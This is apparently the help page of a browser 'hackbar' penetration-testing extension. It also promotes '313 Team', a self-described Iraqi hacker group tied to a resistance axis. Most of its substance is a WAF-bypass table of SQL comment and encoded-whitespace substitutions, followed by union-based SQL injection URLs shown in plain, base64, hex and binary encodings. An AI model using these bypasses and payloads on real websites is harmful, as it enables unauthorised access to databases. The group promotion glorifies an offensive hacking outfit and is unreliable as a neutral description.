SQL Basic
UNION BASED
OUT FILE
WAF BASED
CUSTOM
ERROR/DOUBLE QUERY
TOOLS
WAF BYPASS
LDAP FUZZ
ENCODING
0xHTML
ENCYPTION
XSS
LFI
Restore Defaults
this can restore in to the defaults style
Export Prerence ( txt )
1. change the value of color,font,icon etc.
2. goto setting
3. select Export preferences
3. save the preferences
Import Prerence ( txt )
1. goto setting
2. select Import preferences
3. Select the exported txt preferences
4. Restart your browser
Export Prerence ( txt )
1. change the value of color,font,icon etc.
2. goto setting
3. select Export preferences
3. save the preferences
Import Prerence ( txt )
1. goto setting
2. select Import preferences
3. Select the exported json preferences
4. Restart your browser
watch the video to learn in importing preferences
313 Team or Islamic Cyber Resistance in Iraq (CIRI), The arm responsible for managing the cyber training wing (Liwa Badr) and the software development wing (Liwa Awli Aleazm) of the Islamic Cyber Resistance Axis, A team composed of professional Iraqi hackers and programmers, The Islamic Cyber Resistance in Iraq was founded - 313 Team (June 13, 2023). Hacker Al-Imamah313 - CEO.
Waf Bypass replacing in Space & Parenthesis
Ex: ORDER/**/BY or USER/**/()
Queries | Space | Parenthesis |
---|---|---|
/**/ | Yes | Yes |
+--+ | Yes | No |
/*--*/ | Yes | Yes |
/*&a=*/ | Yes | Yes |
/*1337*/ | Yes | Yes |
/**x**/ | Yes | Yes |
/**_**/ | Yes | Yes |
/**aaa**/ | Yes | Yes |
/*!_STRING_*/ | Yes | No |
/^.*_STRING_.*$/ | Yes | No |
/*!51000_STRING_*/ | Yes | No |
/*!50000_STRING_*/ | Yes | No |
/*!12345_STRING_*/ | Yes | No |
/*!13337_STRING_*/ | Yes | No |
/*!00000_STRING_*/ | Yes | No |
/*!56000_STRING_*/ | Yes | No |
/*!50095_STRING_*/ | Yes | No |
/*!40122_STRING_*/ | Yes | No |
%0A | Yes | Yes |
%0b | Yes | Yes |
%0d%0A | Yes | Yes |
%23%0A | Yes | Yes |
%23aa%0A | Yes | Yes |
%23xyz%0A | Yes | Yes |
%23foo%0D%0A | Yes | Yes |
%23foo*%2F*bar%0D%0A | Yes | Yes |
#qa%0A#%0A | Yes | Yes |
/*!20000%0d%0a_STRING_*/ | Yes | No |
/*!blobblobblob%0d%0a_STRING_*/ | Yes | No |
/*!f****U%0d%0a_STRING_*/ | Yes | No |
Base64 Spacer automatically decode base64 and add [BASE64=DecodedString]
Base64 Spacer is use to SQLI BASE64 without encode & decode
https://site.com/index.php?id=MTI=
0xHEX is use for print String or text in target website.
localhost/index.php?id=12' Union Select 1,2,3,concat(injected by ph.hitachi),5,6,7,8,9,10-- -
%URL encode and decode is use for waf bypassing and many more.
localhost/index.php?id=12' Union Select 1,2,3,4,5,6,7,8,9,10-- -
BASE64 encode and decode is use for SQLI BASE64 (encode & decode)
http://localhost/index.php?id=MTInIFVuaW9uIFNlbGVjdCAxLDIsMyxjb25jYXQoJ2luamVjdGVkIGJ5IHBoLmhpdGFjaGknKSw1LDYsNyw4LDksMTAtLSAt
0bBINARY encode and decode is alternative for printing String or text like 0xHEX function
http://localhost/index.php?id=12' Union Select 1,2,3,concat(0b01110000011010000010111001101000011010010111010001100001011000110110100001101001),5,6,7,8,9,10-- -
Customize your hackbar features are added by Ph.Hitachi for the best experience of using hackbar tools for penetration testing and in this hackbar you can edit or modify basic style like color,font,font-style,font-size,border,border-size,border-radius,opacity and also upload custom icon and choose icon.
Color names, hexcodes, rgb(a) and hsl(a) values are supported for image (*.jpg, *.png, *.gif)
Custom arrow icon you can choose icon or upload icon and you can link from online or url.
you can hide toolbars for overflow or not compatible resolution and also remove style
note: if you remove style this is not back to previous style.